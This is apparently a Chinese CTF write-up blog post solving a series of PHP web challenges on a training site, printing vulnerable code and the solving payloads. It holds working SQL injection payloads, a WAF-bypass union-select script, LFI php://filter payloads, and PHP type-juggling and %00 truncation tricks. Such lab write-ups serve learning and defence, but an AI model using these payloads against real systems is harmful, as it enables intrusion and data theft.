@shaobaobaoer
2018-04-07T01:27:23.000000Z
字数 13062
阅读 2384
ctf
原来塔主不止藏了一道web题啊?
嘿嘿,路径泄露?
参考资料
PHP隐式转换
<?php
include('config.php');
if(empty($_GET['md5'])) die(show_source(__FILE__));
if($_GET['md5']!='240610708' && md5($_GET['md5']) == md5('240610708')) echo $flag;
?>
这是一个比较经典的话题,因为
var_dump(md5('240610708') == md5('QNKCDZO'));
bool(true)
https://stackoverflow.com/questions/22140204/why-md5240610708-is-equal-to-md5qnkcdzo
md5('240610708') 's result is 0e462097431906509019562988736854.
md5('QNKCDZO') 's result is 0e830400451993494058024219903391.
They are both float number format strings (numerical strings), and if you use == in php, when compare a number with a string or the comparison involves numerical strings, then each string is converted to a number and the comparison performed numerically.
Both of the strings are converted to 0 when compared with ==, if you want to compare them as string, remember to use ===(strict comparison) instead.
对于0e开头的php会将其转移为0,如果要避免的话,需要用===(php字符串比较—)
tips:
这是一个php自定义加密函数.
flag的密文:=pJovuTsWOUrtIJZtcKZ2OJMzEJZyMTLdIas,请解密!
function encode($str){
$_o = strrev($str); //倒过来
for($_0=0;$_0<strlen($_o);$_0++){
$_c = substr($_o,$_0,1);
$__ = ord($_c)+1;
$_c = chr($__);
$_= $_.$_c;
}
return str_rot13(strrev(base64_encode($_)));
}
为啥这个题目有点眼熟?好像是实验吧的题目
解密脚本
functiondecode($str){
$_ =base64_decode(strrev(str_rot13($str)));
for($_0=0;$_0<strlen($_);$_0++){
$_c= substr($_,$_0,1);
$__= ord($_c)-1;
$_c= chr($__);
$_o= $_o.$_c;
}
returnstrrev($_o);
}
这是一道考js的题目
查看源代码,发现有个js叫做check.js。
利用webstorm去掉eval后稍微整理一下乱七八糟的代码
拿去运行一下,又是一堆乱七八糟的代码,看到unescape,拿去编码转换一下。勉强可读了。
var strKey1 = "JaVa3C41ptIsAGo0DStAff";
var strKey2 = "CaNUknOWThIsK3y";
var strKey3 = String.fromCharCode(71, 48, 111, 100, 33);
if (uname == (strKey3 + (((strKey1.toLowerCase()).substring(0, strKey1.indexOf("0")) + strKey2.substring(2, 6)).toUpperCase()).substring(0, 15))) {
var strKey4 = 'Java_Scr1pt_Pa4sW0rd_K3y_H3re';
if (upass == (strKey4.substring(strKey4.indexOf('1', 5), strKey4.length - strKey4.indexOf('_') + 5))) {
alert('Login Success!');
document.getElementById('key').innerHTML = unescape("%3Cfont%20color%3D%22%23000%22%3Ea2V5X0NoM2NrXy50eHQ=%3C/font%3E");
} else {
alert('Password Error!');
}
} else {
alert('Login Failed!');
}
看到了很有用的东西,解开得到
打开php发现username error
试了试username不对,id也不对,uname对了,这边有点小脑洞。然后把之前的密码和用户名传上去。得到flag
http://daka.whaledu.com/web/web8/Ch3ck_Au7h.php?uname=G0od!JAVA3C41PTISAGO&&upass=1pt_Pa4sW0rd_K3y_H3re
说实话社工的题不太会做,这边应该要生成一个字典跑一下
尝试到payload Liangchen09231995
然后跳出了个良辰的手机号码?
什么意思?似乎不是flag吧
啥事LFI呢?
http://blog.csdn.net/ncafei/article/details/62085462
http://wps2015.org/drops/drops/PHP%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93.html
构造payload
php://filter/read=convert.base64-encode/resource=index.php
没看懂,需要点提示才行。
后来去看了看原题,原来是swp文件漏洞。知道这个就足够了
这里说下思路,bp太快被宕了。
就是竞争上传和文件截断。
怪不得塔主不开放这道题目
做的很爽的一道题目
有个隐藏的参数,是过滤的字符,如果不填的话就全部过滤。当然它本身也是有waf的机制在里面的。所以需要一些绕过,可以看下我下面的脚本。
admin%25%27univvon+sevvlect table_name,2 from information_schema.tables where table_schema=database() limit 1,1#
admin%27univvon+sevvlect column_name,2 from information_schema.columns where table_name=%27[fl4g]%27 limit 1,1#"
admin%27univvon+sevvlect flag,2 from [fl4g] limit 1,1 #
脚本
#coding=utf-8
from selenium import webdriver
import requests
from time import sleep
payload={
"username":"admin",
"filtername":"vv",
"Submit":"%E6%8F%90%E4%BA%A4"
}
url="http://daka.whaledu.com/web/web14/#"
"admin%25%27univvon+sevvlect+DAvvtavvbavvse(),2#"
def maker(string):
if "union" in string:
string=string.replace("union","univvon")
if "select" in string:
string=string.replace("select","sevvlect")
if "database()" in string:
string=string.replace("database()","DAvvtavvbavvse()")
if "information" in string:
string=string.replace("information","InvvFovvrvvMavvtion")
if "column" in string:
string=string.replace("column","covvLuvvmn")
return string.replace(" ","+")
def illeal_char():
for i in range(33, 128):
s = requests.Session()
payload["username"] = input(">username=")
payload["username"]= maker(payload["username"])
z = s.post(url, payload)
# print(z.text)
if ("I Found you Hacker!" in str(z.content)):
print("[*] illegal char ---- ")
continue
else:
print(z.text)
s.close()
sleep(1)
if __name__ == '__main__':
illeal_char()
哇塞厉害了
真实漏洞靶场?
暂时没有思路
<?php
error_reporting(0);
$flag = '********';
if (isset($_GET['name']) and isset($_GET['password'])){
if ($_GET['name'] == $_GET['password'])
print 'name and password must be diffirent';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die($flag);
else print 'invalid password';
}
?>
老题目了,php默认sha1不能传入数组,不然返回的是false 。false=false直接就过了,md5也是这样的。
进入提示index.phps
<?php
error_reporting(0);
$flag = '*******';
if (isset($_GET['password'])) {
if (strcmp($_GET['password'], $flag) == 0)
die($flag);
else
print 'Invalid password';
}
?>
strcmp函数的漏洞,也是比较老的话题了,和上面那道题目一样,传输数组进去就行
<?php
$flag = '********';
if (isset($_GET['password'])) {
if (is_numeric($_GET['password'])){
if (strlen($_GET['password']) < 4){
if ($_GET['password'] > 999)
die($flag);
else
print '<p class="alert">Too little</p>';
} else
print '<p class="alert">Too long</p>';
} else
print '<p class="alert">Password is not numeric</p>';
}
?>
要求password的长度小于四,值大于999,传入科学计数法的浮点数就可以了
进入之后看到了三个数字,是三个随机生成的数字
<?php
session_start();
$flag = '********';
if (isset ($_GET['password'])) {
if ($_GET['password'] == $_SESSION['password'])
die ('Flag: '.$flag);
else
print '<p class="alert">Wrong guess.</p>';
}
// Unpredictable seed
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>
<section class="login">
<div class="title">
<a href="./index.phps">View Source
</div>
<ul class="list">
<?php
for ($i=0; $i<3; $i++)
print '<li>' . mt_rand (0, 0xffffff) . '</li>';
$_SESSION['password'] = mt_rand (0, 0xffffff);
?>
这里的验证条件是$_GET['password'] == $_SESSION['password']
让password和session之间没有任何关系,但是我们可以改啊?把password和session删了就行
<?php
$flag = '*********';
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo '<p class="alert">You password must be alphanumeric</p>';
else if (strpos ($_GET['password'], '--') !== FALSE)
die($flag);
else
echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
<div class="title">
<a href="./index.phps">View Source</a>
</div>
<form method="POST">
<input type="text" required name="password" placeholder="Password" /><br/>
<input type="submit"/>
</form>
</section>
</body>
</html>
reg %00 截断的问题。
构造payload=1%00%A0--
即可
grep_match('/^[[:graph:]]{12,}$/')
加号需要对url编码才能不被过滤掉
{12,}匹配12次的可打印字符
grep_match('/[[:punct:]]+|[[:digit:]]/')
匹配大小写字母,数字一次
<?php
echo "waht the hell?";
$flag = "*******";
if ("POST" == $_SERVER['REQUEST_METHOD'])
{
$password = $_POST['password'];
if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) // 匹配了12次也就是说字符串的长度需要超过12
{
echo 'Wrong Format';
exit;
}
while (TRUE)
{
$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
if (6 > preg_match_all($reg, $password, $arr))
//匹配的中,大小写字母或数字或标点的至少有一个要超过6个
break;
$c = 0;
$ps = array('punct', 'digit', 'upper', 'lower');
foreach ($ps as $pt)
{
if (preg_match("/[[:$pt:]]+/", $password))
$c += 1;
}
if ($c < 3) break; //array中的四种东西必须全要有
if ("42" == $password) echo $flag;
//password要等于42,这里是弱匹配,所以浮点数和16进制都是可以的,但16进制太短了
else echo 'Wrong password';
exit;
}
}
?>
最终payload: password= 42.000000e-0
<?php
$flag = "*******";
if (0 == strcasecmp($flag, $_GET['key'])) {
echo $flag;
}
else {
echo "Try again";
}
?>
扫描文件备份,还是~
同样是构造数组即可
查看源码抓包都没有什么信息。
然后那万能密码登录一下
username=1%27+or+1%3D1+%23&password=1
结果就。出flag了 (这也太水了吧)
随手输入一个万能秘钥,结果报错了、发现or 被过滤掉了,那么我就用 || 咯
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 #' and password='1'' at line 1
把上面的payload 的 or 改成 || 就行
咋和24一样啊。。。
是不是在图像里面有玄机呢?
是不是在图像里面有玄机呢?
进去访问 显示:
Forbidden
You don't have permission to access /web/web28/ on this server.
咋没啥提示啊,比如说用ie啊什么的,可能要什么插件吧,没有hint不太好做呢
卡了一会儿,现在会了
抓到了个cookie,是 MjY5OTowNDE1NzQwZWFhNGQ5ZGVjYmM4ZGEwMDFkM2ZkODA1Zg%3D%3D
一看就是b64 解密得到
2699:0415740eaa4d9decbc8da001d3fd805f
它说是要 1234567890th 访客
将2699改成 1234567890 再次访问,结果说有个弹窗
秘密就在后面,后面是2699的md5加密
所以我们需要改成1234567890的md5加密
再次修改即可
not allowed!
"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "hacker") { echo "
Access granted!
"; echo "
flag{******}
"; } ?>
Can you authenticate to this website?
莫名其妙 把hacker urlencode就行了
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect("localhost","web32","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
mysql_select_db("web32");
$user = $_POST[user];
$pass = md5($_POST[pass], True);
$query = @mysql_fetch_array(mysql_query("select user from users where (user='$user') and (pw='$pass')"));
if($query[user]=="admin") {
echo "<p>Logged in! flag{***********} </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
?>
很简单的绕过 admin') or 1=1 #
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect("localhost","web33","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
mysql_select_db("web33");
$user = $_POST[user];
$pass = md5($_POST[pass]);
$query = @mysql_fetch_array(mysql_query("select pw from users where user='$user'"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
echo "<p>Logged in! flag{xxxxxxxxxxxxxxxx} </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
<?php
$flag ='**********';
if(isset ($_GET['venvs'])){
if (@ereg ("^[1-9]+$", $_GET['venvs']) === FALSE)
echo '必须输入数字才行';
else if (strpos ($_GET['venvs'], '#VvenusVenusVenvs') !== FALSE)
die('Flag: '.$flag);
else
echo '小样,继续探索吧,啊哈哈哈~';
}
?>
和之前的方法一样 不过这里传数组更加方便一些
<?php
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$v = unserialize($pass);
if ($v) {
$v->secret = "*";
if ($v->secret === $v->enter)
echo "Congratulation! Here is my secret: ".$v->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you OK!";
}
?>
用bp改dir 的地方
web8 和php之间用%00截断即可
南邮的题目,老题目了。
<script type="text/javascript">
window.orialert=alert;
window.alert=function(msg){
checkmsg(msg);
}
function checkmsg(msg){
orialert(msg);
var url="flag.php?msg="+encodeURIComponent(""+msg);
var obj=document.createElement("script");
obj.src=url;
obj.type="text/javascript";
document.body.appendChild(obj);
}
</script>
不明觉厉,这题目蛮简单的
变量覆盖
$$
变量覆盖漏洞 $$
是$$
和extract数组,parse_str字符串。
<?php
extract($_GET);
if(!empty($vs)){
$Ff = trim(file_get_contents($fF));
if($vs!=$Ff){
if(md5($vs) == md5($Ff)){
echo "<p>This is flag:".$flag."</p>";
}
else{
"<p>Variable extract!</>";
}
}
else{
echo "<p>Hacker!</p>";
}
}
?>
问题函数 extract
注意函数file_get_content
vs是文件名。利用php协议传输
将vs赋值为 md5 0e开头的
fF=php://input ,并用post方法提交另外一个的0e md5
<form action="" method="POST">
name: <input type="text" name="name" value="tom" /><br />
age:<input type="text" name="age" value="22" /><br />
<input type="submit" value="Submit" />
</form>
<?php
/**
* Created by PhpStorm.
* User: ninthDVEIL HUNSTER
* Date: 2018/2/14
* Time: 21:11
*/
$homepage = file_get_contents("php://input");
echo $homepage;
?>
file_get_contents 和php://input的一波配合,可以把post的数据给输出出来。
$key = 'venusctf{*********************}';
$IsMatch = preg_match("/key.*KEY.{4,10}key:\/.\/(.*key)[a-z][[:punct:]]/i",trim($_GET["id"]),$match);
if($IsMatch){
highlight_file('2.php');
die('key'.$key);
http://daka.whaledu.com/web/web41/?id=key123key12345key:/a/aakeya;
图片隐写
可能还没出好
塔主好像还没把图片放进去
哈希长度扩展攻击,自己做了好久,看了好久笔记
明天听塔主讲吧
if( isset($_GET['Username']) && isset($_GET['password'])){
$logined = true;
$Username = $_GET['Username'];
$password = $_GET['password'];
if(!ctype_alpha($Username)){$logined = false;}
if(!is_numeric($password)) {$logined = false;}
if(md5($Username) != md5($password)) {$logined = flase;}
if(logined){
echo "Successful !"."<br>";
}else{
echo "login failed !"."<br>";
}
}
if(isset($_POST['message'])){
$message = json_decode($_POST['message']);
$key = "********************";
if($message->key == $key){
echo $key;
}else{
echo "no flag !"."<br>";
}
}else{
echo "浣� 璺� 鍋� 鍟� 锛�";
}
md5('240610708') 's result is 0e462097431906509019562988736854.
md5('QNKCDZO') 's result is 0e830400451993494058024219903391.
登录一下,发现不太对,更改message为post : message={"key":0} php弱比较
给你一个sha1值,它是0-100000之间的整数的md5值再求取sha1值,请在2秒内提交该整数值
请在2秒内提交该整数:
9ec6f9b428237082a103fba7f2b020a683e0ca0a
爆破即可
KEY{J2sa42ahJK-HS11III}